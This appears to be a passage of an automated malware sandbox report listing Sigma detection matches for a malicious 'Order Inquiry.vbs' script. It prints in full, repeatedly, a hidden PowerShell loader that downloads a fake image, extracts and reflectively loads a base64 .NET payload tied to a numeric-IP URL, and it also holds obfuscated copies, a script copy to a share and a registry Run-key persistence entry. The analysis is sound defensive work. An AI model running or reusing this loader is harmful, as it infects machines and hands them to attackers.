7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7592, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", ProcessId: 7592, ProcessName: wscript.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: \\tsclient\C\Program Files\aburrar.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7592, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs", ProcessId: 8056, ProcessName: cmd.exe
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", ProcessId: 7592, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTr